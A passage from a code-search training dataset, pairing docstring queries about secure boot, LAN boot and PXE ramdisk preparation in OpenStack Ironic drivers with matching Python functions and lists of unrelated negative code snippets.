"def test_movie_creation(self):\n\t\tmovie = self.create_movie()\n\t\tself.assertTrue(isinstance(movie, Movie))"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Disables secure boot on node, if secure boot is enabled on node. This method checks if secure boot is enabled on node. If enabled, it disables same and returns True.
|
def _disable_secure_boot(task):
cur_sec_state = False
try:
cur_sec_state = sdflex_common.get_secure_boot_mode(task)
except exception.SDFlexOperationNotSupported:
LOG.debug('Secure boot mode is not supported for node %s',
task.node.uuid)
else:
if cur_sec_state:
LOG.debug('Disabling secure boot for node %s', task.node.uuid)
sdflex_common.set_secure_boot_mode(task, False)
|
[
"def disable_secure_boot_if_supported(task):\n try:\n sdflex_common.update_secure_boot_mode(task, False)\n # We need to handle SDFlexOperationNotSupported exception so that if\n # the user has incorrectly specified the Node capability\n # 'secure_boot' to a node that does not have that capability and\n # attempted deploy. Handling this exception here, will help the\n # user to tear down such a Node.\n except exception.SDFlexOperationNotSupported:\n LOG.warning('Secure boot mode is not supported for node %s',\n task.node.uuid)",
"def is_enabled(node):\n return not node[\"disable\"].value()",
"def enable_ultra_ssd(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"enable_ultra_ssd\")",
"def task_disable_selinux():\n return sequence([\n run(\"if selinuxenabled; then setenforce 0; fi\"),\n run(\"test -e /etc/selinux/config && \"\n \"sed --in-place='.preflocker' \"\n \"'s/^SELINUX=.*$/SELINUX=disabled/g' \"\n \"/etc/selinux/config\"),\n ])",
"def check_secure_boot_status(show_alert=False):\n boot_mode = get_boot_mode()\n cmd = ['PowerShell', '-Command', 'Confirm-SecureBootUEFI']\n result = run_program(cmd, check=False)\n\n # Check results\n if result.returncode == 0:\n out = result.stdout.decode()\n if 'True' in out:\n # It's on, do nothing\n return\n elif 'False' in out:\n if show_alert:\n show_alert_box('Secure Boot DISABLED')\n raise SecureBootDisabledError\n else:\n if show_alert:\n show_alert_box('Secure Boot status UNKNOWN')\n raise SecureBootUnknownError\n else:\n if boot_mode != 'UEFI':\n if (show_alert and\n global_vars['OS']['Version'] in ('8', '8.1', '10')):\n # OS supports Secure Boot\n show_alert_box('Secure Boot DISABLED\\n\\nOS installed LEGACY')\n raise OSInstalledLegacyError\n else:\n # Check error message\n err = result.stderr.decode()\n if 'Cmdlet not supported' in err:\n if show_alert:\n show_alert_box('Secure Boot UNAVAILABLE?')\n raise SecureBootNotAvailError\n else:\n if show_alert:\n show_alert_box('Secure Boot ERROR')\n raise GenericError",
"def try_disable_insecure_reclaim():\n if is_leader():\n try:\n subprocess.check_call([\n 'ceph', '--id', 'admin',\n 'config', 'set', 'mon',\n 'auth_allow_insecure_global_id_reclaim', 'false'])\n except subprocess.CalledProcessError as e:\n log(\"Could not disable insecure reclaim: {}\".format(e),\n level='ERROR')",
"def is_enabled(self) -> bool:\n if not self._system.dax_sim_enabled:\n # Check if the system was just booted\n last_asf = self.core_cache.get(self._CACHE_LAST_ASF_KEY)\n if len(last_asf) == 0:\n # Device was just booted, trap RF is off\n return False\n\n # Return the enabled flag stored as a system dataset\n # Can raise a KeyError if the key was not set before, which means the state is ambiguous\n enabled: bool = self.get_dataset_sys(self._ENABLED_KEY) # Helps the type checker\n return enabled",
"def is_enabled_for(self, security_state: Target.SecurityState) -> bool:\n assert isinstance(security_state, Target.SecurityState)\n\n # Call to superclass to read CSW. We want to bypass our CSW cache since the enable signal can change\n # asynchronously.\n csw = AccessPort.read_reg(self, self._reg_offset + MEM_AP_CSW)\n if security_state is Target.SecurityState.NONSECURE:\n # Nonsecure transfers are always allowed when security transfers are enabled.\n return (csw & (CSW_DEVICEEN | CSW_SDEVICEEN)) != 0\n elif security_state is Target.SecurityState.SECURE:\n return (csw & CSW_SDEVICEEN) != 0\n else:\n assert False, \"unsupported security state\"",
"def test_disable():\n console = Console()\n\n assert console.enabled\n\n console.enabled = False\n\n assert not console.enabled",
"def disable_ssl(self) -> bool:\n return pulumi.get(self, \"disable_ssl\")",
"def disabled(kls):\n from wouso.core.config.models import BoolSetting\n\n return BoolSetting.get('setting-%s' % kls.name()).get_value() is False",
"def is_disabled(self):\n return self.node.is_disabled()",
"def _helper_disabled(self):\n disabled = ADDON.getSetting('disabled')\n if not disabled:\n ADDON.setSetting('disabled', 'false') # create default entry\n disabled = 'false'\n\n if disabled == 'true':\n self._log('inputstreamhelper is disabled in settings.xml.')\n return True\n else:\n self._log('inputstreamhelper is enabled. You can disable inputstreamhelper by setting \\\"disabled\\\" to \\\"true\\\" in settings.xml (Note: only recommended for developers knowing what they\\'re doing!)')\n return False",
"def kdump_disable(db):\n kdump_table = db.cfgdb.get_table(\"KDUMP\")\n check_kdump_table_existence(kdump_table)\n\n db.cfgdb.mod_entry(\"KDUMP\", \"config\", {\"enabled\": \"false\"})\n click.echo(\"KDUMP configuration changes may require a reboot to take effect.\")\n click.echo(\"Save SONiC configuration using 'config save' before issuing the reboot command.\")",
"def disable(self):\n result = self.__enabled\n self.__enabled = False\n return result",
"def disable_secure_nat(self, hubname: str):\n return self._request_handler(json={\n \"jsonrpc\": \"2.0\",\n \"id\": \"rpc_call_id\",\n \"method\": \"DisableSecureNAT\",\n \"params\": {\n \"HubName_str\": hubname\n }\n })",
"def is_iscsi_boot_supported(self):\n return utils.is_operation_allowed(\n 'PATCH', self,\n ['@Redfish.Settings', 'SettingsObject'])",
"def negative_auto_cic_maintenance_mode(self):\n self.env.revert_snapshot('cic_maintenance_mode')\n\n cluster_id = self.fuel_web.get_last_created_cluster()\n\n # Select a non-primary controller\n regular_ctrl = self.fuel_web.get_nailgun_node_by_name(\"slave-02\")\n dregular_ctrl = self.fuel_web.get_devops_node_by_nailgun_node(\n regular_ctrl)\n _ip = regular_ctrl['ip']\n _id = regular_ctrl['id']\n\n asserts.assert_true('True' in check_available_mode(_ip),\n \"Maintenance mode is not available\")\n logger.info('Disable UMM on node-{0}'.format(_id))\n\n change_config(_ip, umm=False, reboot_count=0)\n\n asserts.assert_false('True' in check_available_mode(_ip),\n \"Maintenance mode should not be available\")\n\n command = 'reboot --force >/dev/null & '\n\n logger.info('Unexpected reboot on node-{0}'\n .format(_id))\n\n self.ssh_manager.execute_on_remote(\n ip=_ip,\n cmd=command)\n\n wait(lambda:\n not checkers.check_ping(self.env.get_admin_node_ip(),\n _ip),\n timeout=60 * 10)\n\n # Node don't have enough time for set offline status\n # after reboot --force\n # Just waiting\n\n asserts.assert_true(\n checkers.check_ping(self.env.get_admin_node_ip(),\n _ip,\n deadline=600),\n \"Host {0} is not reachable by ping during 600 sec\"\n \"\".format(_ip))\n logger.info('Wait a node-{0} online status after unexpected '\n 'reboot'.format(_id))\n\n self.fuel_web.wait_nodes_get_online_state([dregular_ctrl])\n\n logger.info('Check that node-{0} not in maintenance mode after'\n ' unexpected reboot'.format(_id))\n\n wait(lambda: tcp_ping(_ip, 22),\n timeout=60 * 10,\n timeout_msg='Node {} still is not available by SSH'.format(\n dregular_ctrl.name))\n\n asserts.assert_false('True' in check_auto_mode(_ip),\n \"Maintenance mode should not switched\")\n\n # Wait until MySQL Galera is UP on some controller\n self.fuel_web.wait_mysql_galera_is_up(\n [dregular_ctrl.name])\n\n # Wait until Cinder services UP on a controller\n self.fuel_web.wait_cinder_is_up(\n [dregular_ctrl.name])\n\n # Wait until RabbitMQ cluster is UP\n wait_pass(lambda:\n self.fuel_web.run_single_ostf_test(\n cluster_id, test_sets=['ha'],\n test_name=ostf_test_mapping.OSTF_TEST_MAPPING.get(\n 'RabbitMQ availability')),\n timeout=1500)\n logger.info('RabbitMQ cluster is available')\n\n wait_pass(lambda:\n self.fuel_web.run_single_ostf_test(\n cluster_id, test_sets=['sanity'],\n test_name=ostf_test_mapping.OSTF_TEST_MAPPING.get(\n 'Check that required services are running')),\n timeout=1500)\n logger.info(\"Required services are running\")\n\n try:\n self.fuel_web.run_ostf(cluster_id,\n test_sets=['smoke', 'sanity', 'ha'])\n except AssertionError:\n logger.debug(\"Test failed from first probe,\"\n \" we sleep 600 second try one more time\"\n \" and if it fails again - test will fails \")\n time.sleep(600)\n self.fuel_web.run_ostf(cluster_id,\n test_sets=['smoke', 'sanity', 'ha'])",
"def disable(nitro, service):\n __service = NSService()\n __service.set_name(service.get_name())\n __service.set_delay(service.get_delay())\n __service.set_graceful(service.get_graceful())\n return __service.perform_operation(nitro, \"disable\")"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Checks if directed lanboot is requested
|
def is_directed_lanboot_requested(node):
directed_lanboot_requested = (
str(node.driver_info.get('enable_directed_lanboot', 'false')).lower())
return directed_lanboot_requested == 'true'
|
[
"def has_lldp_cli(self):\n cmd = self.cli(\"show config dynamic\", ignore_errors=True)\n return \"enable lldp\" in cmd",
"def is_lcd_reachable():\n\n response = requests.get(NODE_INFO_ENDPOINT)\n return True if response.status_code == 200 else False",
"def iswitch_initialized():\n return (path.isdir(get_iswitch_dir_path()) and\n path.islink(get_irods_config_path()) and\n os.readlink(get_irods_config_path()).startswith(get_iswitch_dir_path()+\"/\"))",
"def checkNetworkStatus(self):\r\n pass",
"def has_lldp_cli(self):\n try:\n cmd = self.cli(\"show lldp configuration\", cached=True)\n return \"LLDP state: Enabled\" in cmd\n except self.CLISyntaxError:\n # On SKS-16E1-IP-I-4P Series Software, Version 2.2.0C Build 40897\n # we are not have way, to see, if lldp enabled global\n return True",
"def has_lldp(self):\n cmd = self.cli(\"show lldp | include State\")\n return self.rx_lldp.search(cmd) is not None",
"def check_available(self):\n self._available = None\n self.last_check_time = datetime.datetime.now()\n if self.device_up:\n self.check_local_ip()\n if self.gateway and not self.check_gateway():\n self.status = 'Gateway {} not reachable'.format(self.gateway)\n logger.critical('Gateway {} not reachable'.format(self.gateway))\n ping_ip = self.target_ip\n if ping_ip:\n self.check_test_route()\n (returncode,output) = run('/bin/ping -q -n -c{ping_count:n} -W{timeout:n} -i{ping_interval} -I{device} {target_ip}'.format(\n ping_count = self.ping_count,\n timeout = self.timeout,\n device = self.device,\n target_ip = ping_ip,\n ping_interval=self.ping_interval,\n ))\n if returncode == 0:\n report = REPORT.search(output)\n rtt = RTT.search(output)\n if report:\n self.last_loss = int(report.groupdict()['loss'])\n else:\n self.last_loss = None\n if rtt:\n self.last_rtt = float(rtt.groupdict()['avg'])\n else:\n self.last_rtt = None\n\n self._available = report and rtt and\\\n self.last_loss<=self.max_loss and\\\n self.last_rtt<=self.max_rtt\n if self._available:\n self.status='OK'\n elif self.last_loss>self.max_loss:\n self.status='Too much loss {}%'.format(self.last_loss)\n elif self.last_rtt>self.max_rtt:\n self.status='Too long RTT {}ms'.format(self.last_rtt)\n else:\n self.status = 'ping test failed : {}'.format(output)\n else:\n self._available = True\n else:\n self.status = 'Device {} is down or link state is unknown'.format(self.device)\n self._available = False\n\n self.update_leds()\n return self._available",
"def __check_neighbour(self, address):\n print(\"neighbour checked!\")\n if self.stream.get_node_by_server(address[0], address[1]):\n if not (self.stream.get_node_by_server(address[0], address[1]).is_register()):\n return True\n\n pass",
"def check_test_route(self):\n if self.target_ip:\n (retcode,route) = run('/sbin/ip route show {target_ip}'.format(target_ip=self.target_ip))\n if self.gateway:\n if not \"{target_ip} via {gateway}\".format(target_ip=self.target_ip,gateway=self.gateway) in route:\n logger.debug(run('/sbin/ip route del {target_ip}'.format(target_ip=self.target_ip),dry_run=self.dry_run)[1])\n logger.warning('No route for {target_ip} via {gateway}, adding one'.format(target_ip=self.target_ip,gateway=self.gateway))\n logger.debug(run('/sbin/ip route add {target_ip} via {gateway}'.format(target_ip=self.target_ip,gateway=self.gateway),dry_run=self.dry_run)[1])\n elif self.device:\n if not \" {} \".format(self.device) in route:\n logger.warning('No route for {target_ip} through {device}, adding one'.format(target_ip=self.target_ip,device=self.device))\n logger.debug(run('/sbin/ip route add {target_ip} dev {device}'.format(target_ip=self.target_ip,device=self.device),dry_run=self.dry_run)[1])\n else:\n logger.critical('No gateway for {target_ip}'.format(target_ip=self.target_ip))",
"def update_broadlink_on_toggle(mac_adress, input_bool):\n\n #Before running this service check the state of the input_boolean. If the state is off then do not run the service\n state = state.get(input_bool) \n if state == \"off\":\n log.debug(\"The device is off - The service will not try to update\") \n return \n\n ##Get recorded information in the json file\n json_data = read_json_data(os.path.join(BROADLINK_CONFIG_FOLDER, mac_adress.replace(':', '') + \".json\"))\n ip_address = json_data[\"ip\"]\n try: \n device = blk.hello(ip_address, timeout = 1)# Is this timeout enough? Since its in the local network it should be fine\n except blk.exceptions.NetworkTimeoutError: \n message = f\"Could not reach the IP address {ip_address}. Running discovery ...\" \n notify.persistent_notification(message = message, title = \"Broadlink\")\n broadlink_raceland.update_broadlink_remotes() #Update broadlink devices if there was a network error \n \n else: \n discovered_device_mac = format_mac(device.mac) #Note: pyscript does not support iterators\n if discovered_device_mac != mac_adress: #On the off chance the IP adress update makes one device have the IP address of another device (broadlink)\n message = f\"Ip address was updated {ip_address}. Running discovery ...\"\n notify.persistent_notification(message = message, title = \"Broadlink\")\n broadlink_raceland.update_broadlink_remotes() #Update broadlink devices if there was a network error ",
"def is_existing_flat_vlan_allowed():\n return bool(CONF.nuage_sut.nuage_sriov_allow_existing_flat_vlan)",
"def requested_load_balancer_management(self):\n return bool(self._unit.received[\"enable-load-balancer-management\"])",
"def loopback(self): # bool\n return self._loopback",
"def readyForNewRoute():\r\n if cLoca == cDest & cStat == ready & nDest == 0:\r\n return 1\r\n else:\r\n return 0",
"def is_loopback(address: IPv4Address | IPv6Address) -> bool:\n return any(address in network for network in LOOPBACK_NETWORKS)",
"def has_ap_layer(pkt):\n if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp) or pkt.haslayer(Dot11AssoResp):\n # if this packet has layer beacon, or probe response or association response\n if hasattr(pkt, 'addr2'):\n # it is an Access Point packet\n return True\n return False",
"def needs_init(self):\n return (self._node_device_status and (self._node_device_status.tag == 'down'\n or self._node_device_status.tag == 'unready'))",
"def display_is_loopback_error(self):\r\n self._display_error(\"This address seems to be a loopback address. Please try again.\")",
"def check_devices(self) -> bool:\n\t\tpass"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Disables secure boot on node, does not throw if its not supported.
|
def disable_secure_boot_if_supported(task):
try:
sdflex_common.update_secure_boot_mode(task, False)
# We need to handle SDFlexOperationNotSupported exception so that if
# the user has incorrectly specified the Node capability
# 'secure_boot' to a node that does not have that capability and
# attempted deploy. Handling this exception here, will help the
# user to tear down such a Node.
except exception.SDFlexOperationNotSupported:
LOG.warning('Secure boot mode is not supported for node %s',
task.node.uuid)
|
[
"def _disable_secure_boot(task):\n cur_sec_state = False\n try:\n cur_sec_state = sdflex_common.get_secure_boot_mode(task)\n except exception.SDFlexOperationNotSupported:\n LOG.debug('Secure boot mode is not supported for node %s',\n task.node.uuid)\n else:\n if cur_sec_state:\n LOG.debug('Disabling secure boot for node %s', task.node.uuid)\n sdflex_common.set_secure_boot_mode(task, False)",
"def try_disable_insecure_reclaim():\n if is_leader():\n try:\n subprocess.check_call([\n 'ceph', '--id', 'admin',\n 'config', 'set', 'mon',\n 'auth_allow_insecure_global_id_reclaim', 'false'])\n except subprocess.CalledProcessError as e:\n log(\"Could not disable insecure reclaim: {}\".format(e),\n level='ERROR')",
"def task_disable_selinux():\n return sequence([\n run(\"if selinuxenabled; then setenforce 0; fi\"),\n run(\"test -e /etc/selinux/config && \"\n \"sed --in-place='.preflocker' \"\n \"'s/^SELINUX=.*$/SELINUX=disabled/g' \"\n \"/etc/selinux/config\"),\n ])",
"def disable_self_heal_daemon(mnode, volname):\n cmd = \"gluster volume set %s self-heal-daemon off\" % volname\n ret, _, _ = g.run(mnode, cmd)\n if ret != 0:\n return False\n\n return True",
"def disable_secure_nat(self, hubname: str):\n return self._request_handler(json={\n \"jsonrpc\": \"2.0\",\n \"id\": \"rpc_call_id\",\n \"method\": \"DisableSecureNAT\",\n \"params\": {\n \"HubName_str\": hubname\n }\n })",
"def disable_module(address, name, module):\n explore = explorepy.explore.Explore()\n explore.connect(mac_address=address, device_name=name)\n explore.disable_module(module)",
"def poweroff():\r\n call(['systemctl', 'poweroff', '-i'])",
"def negative_auto_cic_maintenance_mode(self):\n self.env.revert_snapshot('cic_maintenance_mode')\n\n cluster_id = self.fuel_web.get_last_created_cluster()\n\n # Select a non-primary controller\n regular_ctrl = self.fuel_web.get_nailgun_node_by_name(\"slave-02\")\n dregular_ctrl = self.fuel_web.get_devops_node_by_nailgun_node(\n regular_ctrl)\n _ip = regular_ctrl['ip']\n _id = regular_ctrl['id']\n\n asserts.assert_true('True' in check_available_mode(_ip),\n \"Maintenance mode is not available\")\n logger.info('Disable UMM on node-{0}'.format(_id))\n\n change_config(_ip, umm=False, reboot_count=0)\n\n asserts.assert_false('True' in check_available_mode(_ip),\n \"Maintenance mode should not be available\")\n\n command = 'reboot --force >/dev/null & '\n\n logger.info('Unexpected reboot on node-{0}'\n .format(_id))\n\n self.ssh_manager.execute_on_remote(\n ip=_ip,\n cmd=command)\n\n wait(lambda:\n not checkers.check_ping(self.env.get_admin_node_ip(),\n _ip),\n timeout=60 * 10)\n\n # Node don't have enough time for set offline status\n # after reboot --force\n # Just waiting\n\n asserts.assert_true(\n checkers.check_ping(self.env.get_admin_node_ip(),\n _ip,\n deadline=600),\n \"Host {0} is not reachable by ping during 600 sec\"\n \"\".format(_ip))\n logger.info('Wait a node-{0} online status after unexpected '\n 'reboot'.format(_id))\n\n self.fuel_web.wait_nodes_get_online_state([dregular_ctrl])\n\n logger.info('Check that node-{0} not in maintenance mode after'\n ' unexpected reboot'.format(_id))\n\n wait(lambda: tcp_ping(_ip, 22),\n timeout=60 * 10,\n timeout_msg='Node {} still is not available by SSH'.format(\n dregular_ctrl.name))\n\n asserts.assert_false('True' in check_auto_mode(_ip),\n \"Maintenance mode should not switched\")\n\n # Wait until MySQL Galera is UP on some controller\n self.fuel_web.wait_mysql_galera_is_up(\n [dregular_ctrl.name])\n\n # Wait until Cinder services UP on a controller\n self.fuel_web.wait_cinder_is_up(\n [dregular_ctrl.name])\n\n # Wait until RabbitMQ cluster is UP\n wait_pass(lambda:\n self.fuel_web.run_single_ostf_test(\n cluster_id, test_sets=['ha'],\n test_name=ostf_test_mapping.OSTF_TEST_MAPPING.get(\n 'RabbitMQ availability')),\n timeout=1500)\n logger.info('RabbitMQ cluster is available')\n\n wait_pass(lambda:\n self.fuel_web.run_single_ostf_test(\n cluster_id, test_sets=['sanity'],\n test_name=ostf_test_mapping.OSTF_TEST_MAPPING.get(\n 'Check that required services are running')),\n timeout=1500)\n logger.info(\"Required services are running\")\n\n try:\n self.fuel_web.run_ostf(cluster_id,\n test_sets=['smoke', 'sanity', 'ha'])\n except AssertionError:\n logger.debug(\"Test failed from first probe,\"\n \" we sleep 600 second try one more time\"\n \" and if it fails again - test will fails \")\n time.sleep(600)\n self.fuel_web.run_ostf(cluster_id,\n test_sets=['smoke', 'sanity', 'ha'])",
"def gpu_disable():\n return msg(\"GPU: disable\")",
"def prepare_instance(self, task):\n # Need to enable secure boot, if being requested.\n # update_secure_boot_mode checks and enables secure boot only if the\n # deploy has requested secure boot\n boot_option = deploy_utils.get_boot_option(task.node)\n if boot_option != \"kickstart\":\n sdflex_common.update_secure_boot_mode(task, True)\n if not http_utils.is_http_boot_requested(task.node):\n if boot_option == \"kickstart\":\n prepare_node_for_deploy(task)\n super(SdflexPXEBoot, self).prepare_instance(task)\n else:\n boot_mode_utils.sync_boot_mode(task)\n node = task.node\n boot_option = deploy_utils.get_boot_option(node)\n boot_device = None\n instance_image_info = {}\n if boot_option == \"ramdisk\":\n instance_image_info = http_utils.get_instance_image_info(task)\n http_utils.cache_ramdisk_kernel(task, instance_image_info)\n if deploy_utils.is_iscsi_boot(task) or boot_option == \"ramdisk\":\n http_utils.prepare_instance_http_config(\n task, instance_image_info,\n iscsi_boot=deploy_utils.is_iscsi_boot(task),\n ramdisk_boot=(boot_option == \"ramdisk\"))\n if http_utils.is_http_boot_requested(task.node):\n boot_device = boot_devices.UEFIHTTP\n else:\n boot_device = boot_devices.PXE\n elif boot_option != \"local\":\n if task.driver.storage.should_write_image(task):\n # Make sure that the instance kernel/ramdisk is cached.\n # This is for the takeover scenario for active nodes.\n instance_image_info = (\n http_utils.get_instance_image_info(task))\n http_utils.cache_ramdisk_kernel(task, instance_image_info)\n iwdi = (\n task.node.driver_internal_info.get('is_whole_disk_image'))\n try:\n root_uuid_or_disk_id = task.node.driver_internal_info[\n 'root_uuid_or_disk_id'\n ]\n except KeyError:\n if not task.driver.storage.should_write_image(task):\n pass\n elif not iwdi:\n LOG.warning(\"The UUID for the root partition can't be\"\n \" found, unable to switch the pxe config \"\n \"from deployment mode to service (boot) \"\n \"mode for node %(node)s\",\n {\"node\": task.node.uuid})\n else:\n LOG.warning(\"The disk id for the whole disk image \"\n \"can't be found, unable to switch the \"\n \"pxe config from deployment mode to \"\n \"service (boot) mode for node %(node)s. \"\n \"Booting the instance from disk.\",\n {\"node\": task.node.uuid})\n http_utils.clean_up_http_config(task)\n boot_device = boot_devices.DISK\n else:\n http_utils.build_service_http_config(task,\n instance_image_info,\n root_uuid_or_disk_id)\n if http_utils.is_http_boot_requested(task.node):\n boot_device = boot_devices.UEFIHTTP\n else:\n boot_device = boot_devices.PXE\n else:\n # If it's going to boot from the local disk, we don't need\n # PXE config files. They still need to be generated as part\n # of the prepare() because the deployment does PXE boot the\n # deploy ramdisk\n http_utils.clean_up_http_config(task)\n boot_device = boot_devices.DISK\n\n # NOTE(pas-ha) do not re-set boot device on ACTIVE nodes\n # during takeover\n if boot_device and task.node.provision_state != states.ACTIVE:\n persistent = True\n if node.driver_info.get('force_persistent_boot_device',\n 'Default') == 'Never':\n persistent = False\n manager_utils.node_set_boot_device(task, boot_device,\n persistent=persistent)",
"def check_secure_boot_status(show_alert=False):\n boot_mode = get_boot_mode()\n cmd = ['PowerShell', '-Command', 'Confirm-SecureBootUEFI']\n result = run_program(cmd, check=False)\n\n # Check results\n if result.returncode == 0:\n out = result.stdout.decode()\n if 'True' in out:\n # It's on, do nothing\n return\n elif 'False' in out:\n if show_alert:\n show_alert_box('Secure Boot DISABLED')\n raise SecureBootDisabledError\n else:\n if show_alert:\n show_alert_box('Secure Boot status UNKNOWN')\n raise SecureBootUnknownError\n else:\n if boot_mode != 'UEFI':\n if (show_alert and\n global_vars['OS']['Version'] in ('8', '8.1', '10')):\n # OS supports Secure Boot\n show_alert_box('Secure Boot DISABLED\\n\\nOS installed LEGACY')\n raise OSInstalledLegacyError\n else:\n # Check error message\n err = result.stderr.decode()\n if 'Cmdlet not supported' in err:\n if show_alert:\n show_alert_box('Secure Boot UNAVAILABLE?')\n raise SecureBootNotAvailError\n else:\n if show_alert:\n show_alert_box('Secure Boot ERROR')\n raise GenericError",
"def __init__(self, device_name, msg):\n super(PasswordNotDisabledError, self).__init__(\n device_name, msg, reason=\"root user still has a password\")",
"def test_boot_no_safe(self, no_safe_robot):\n with mock.patch.object(no_safe_robot, \"go_safe_pos\", autospec=True) as mock_func:\n with mock.patch(\"src.printer_components.MelfaRobot.sleep\", return_value=None):\n no_safe_robot.boot()\n assert not mock_func.called",
"def run_disable_rhnplugin():\n run(\"sed -i 's/enabled = 1/enabled = 0/g' /etc/yum/pluginconf.d/rhnplugin.conf\")",
"def disable(self, host, binary):\n body = {\"host\": host, \"binary\": binary}\n result = self._update(\"/os-services/disable\", body)\n return self.resource_class(self, result, resp=result.request_ids)",
"def disable_autologin():\n print(\"Removing default user\")\n try:\n remove_default_user()\n except:\n pass\n print(\"Disabling automatic login\")\n if not check_slim_conf():\n return False\n if not run_with_sudo([\"sed\", \"-i\", \"''\", \"-e\", \"s/^auto_login.*/#auto_login no/g\", slim_config_file]):\n return False\n QMessageBox.information(None, \"Automatic login\", \"Automatic login has been disabled.\")\n return True",
"def disable(cls, client, resource) :\n try :\n if type(resource) is not list :\n disableresource = nsfeature()\n disableresource.feature = resource.feature\n return disableresource.perform_operation(client,\"disable\")\n except Exception as e :\n raise e",
"def disable(nitro, service):\n __service = NSService()\n __service.set_name(service.get_name())\n __service.set_delay(service.get_delay())\n __service.set_graceful(service.get_graceful())\n return __service.perform_operation(nitro, \"disable\")",
"def kdump_disable(db):\n kdump_table = db.cfgdb.get_table(\"KDUMP\")\n check_kdump_table_existence(kdump_table)\n\n db.cfgdb.mod_entry(\"KDUMP\", \"config\", {\"enabled\": \"false\"})\n click.echo(\"KDUMP configuration changes may require a reboot to take effect.\")\n click.echo(\"Save SONiC configuration using 'config save' before issuing the reboot command.\")"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Prepares the boot of Ironic ramdisk using PXE. This method prepares the boot of the deploy or rescue ramdisk after reading relevant information from the node's driver_info and instance_info.
|
def prepare_ramdisk(self, task, ramdisk_params):
if task.node.provision_state in (states.DEPLOYING, states.RESCUING,
states.CLEANING, states.INSPECTING):
prepare_node_for_deploy(task)
if not http_utils.is_http_boot_requested(task.node):
super(SdflexPXEBoot, self).prepare_ramdisk(task, ramdisk_params)
else:
node = task.node
# Label indicating a deploy or rescue operation being carried out
# on the node, 'deploy' or 'rescue'. Unless the node is in a
# rescue like state, the mode is set to 'deploy', indicating
# deploy operation is being carried out.
mode = deploy_utils.rescue_or_deploy_mode(node)
http_info = http_utils.get_image_info(node, mode=mode)
# NODE: Try to validate and fetch instance images only
# if we are in DEPLOYING state.
if node.provision_state == states.DEPLOYING:
http_info.update(http_utils.get_instance_image_info(task))
boot_mode_utils.sync_boot_mode(task)
http_options = http_utils.build_http_config_options(task,
http_info)
http_options.update(ramdisk_params)
http_config_template = deploy_utils.get_pxe_config_template(node)
http_utils.create_http_config(task, http_options,
http_config_template)
manager_utils.node_set_boot_device(task, boot_devices.UEFIHTTP,
persistent=False)
if http_info:
http_utils.cache_ramdisk_kernel(task, http_info)
bfpv = str(task.node.driver_info.get('bfpv', 'false')).lower()
if bfpv == 'true':
node = task.node
driver_internal_info = node.driver_internal_info
driver_internal_info['bfpv_started'] = 'false'
node.driver_internal_info = driver_internal_info
node.save()
|
[
"def prepare_ramdisk(self, task, ramdisk_params):\n node = task.node\n\n # Label indicating a deploy or rescue operation being carried out on\n # the node, 'deploy' or 'rescue'. Unless the node is in a rescue like\n # state, the mode is set to 'deploy', indicating deploy operation is\n # being carried out.\n mode = deploy_utils.rescue_or_deploy_mode(node)\n\n if self.ipxe_enabled:\n # NOTE(mjturek): At this point, the ipxe boot script should\n # already exist as it is created at startup time. However, we\n # call the boot script create method here to assert its\n # existence and handle the unlikely case that it wasn't created\n # or was deleted.\n pxe_utils.create_ipxe_boot_script()\n\n # Generate options for both IPv4 and IPv6, and they can be\n # filtered down later based upon the port options.\n # TODO(TheJulia): This should be re-tooled during the Victoria\n # development cycle so that we call a single method and return\n # combined options. The method we currently call is relied upon\n # by two eternal projects, to changing the behavior is not ideal.\n dhcp_opts = pxe_utils.dhcp_options_for_instance(\n task, ipxe_enabled=self.ipxe_enabled, ip_version=4)\n dhcp_opts += pxe_utils.dhcp_options_for_instance(\n task, ipxe_enabled=self.ipxe_enabled, ip_version=6)\n provider = dhcp_factory.DHCPFactory()\n provider.update_dhcp(task, dhcp_opts)\n\n pxe_info = pxe_utils.get_image_info(node, mode=mode,\n ipxe_enabled=self.ipxe_enabled)\n\n # NODE: Try to validate and fetch instance images only\n # if we are in DEPLOYING state.\n if node.provision_state == states.DEPLOYING:\n pxe_info.update(\n pxe_utils.get_instance_image_info(\n task, ipxe_enabled=self.ipxe_enabled))\n\n boot_mode_utils.sync_boot_mode(task)\n\n pxe_options = pxe_utils.build_pxe_config_options(\n task, pxe_info, ipxe_enabled=self.ipxe_enabled,\n ramdisk_params=ramdisk_params)\n # TODO(dtantsur): backwards compability hack, remove in the V release\n if ramdisk_params.get(\"ipa-api-url\"):\n pxe_options[\"ipa-api-url\"] = ramdisk_params[\"ipa-api-url\"]\n\n if self.ipxe_enabled:\n pxe_config_template = deploy_utils.get_ipxe_config_template(node)\n else:\n pxe_config_template = deploy_utils.get_pxe_config_template(node)\n\n pxe_utils.create_pxe_config(task, pxe_options,\n pxe_config_template,\n ipxe_enabled=self.ipxe_enabled)\n manager_utils.node_set_boot_device(task, boot_devices.PXE,\n persistent=False)\n\n if self.ipxe_enabled and CONF.pxe.ipxe_use_swift:\n kernel_label = '%s_kernel' % mode\n ramdisk_label = '%s_ramdisk' % mode\n pxe_info.pop(kernel_label, None)\n pxe_info.pop(ramdisk_label, None)\n\n if pxe_info:\n pxe_utils.cache_ramdisk_kernel(task, pxe_info,\n ipxe_enabled=self.ipxe_enabled)\n\n LOG.debug('Ramdisk (i)PXE boot for node %(node)s has been prepared '\n 'with kernel params %(params)s',\n {'node': node.uuid, 'params': pxe_options})",
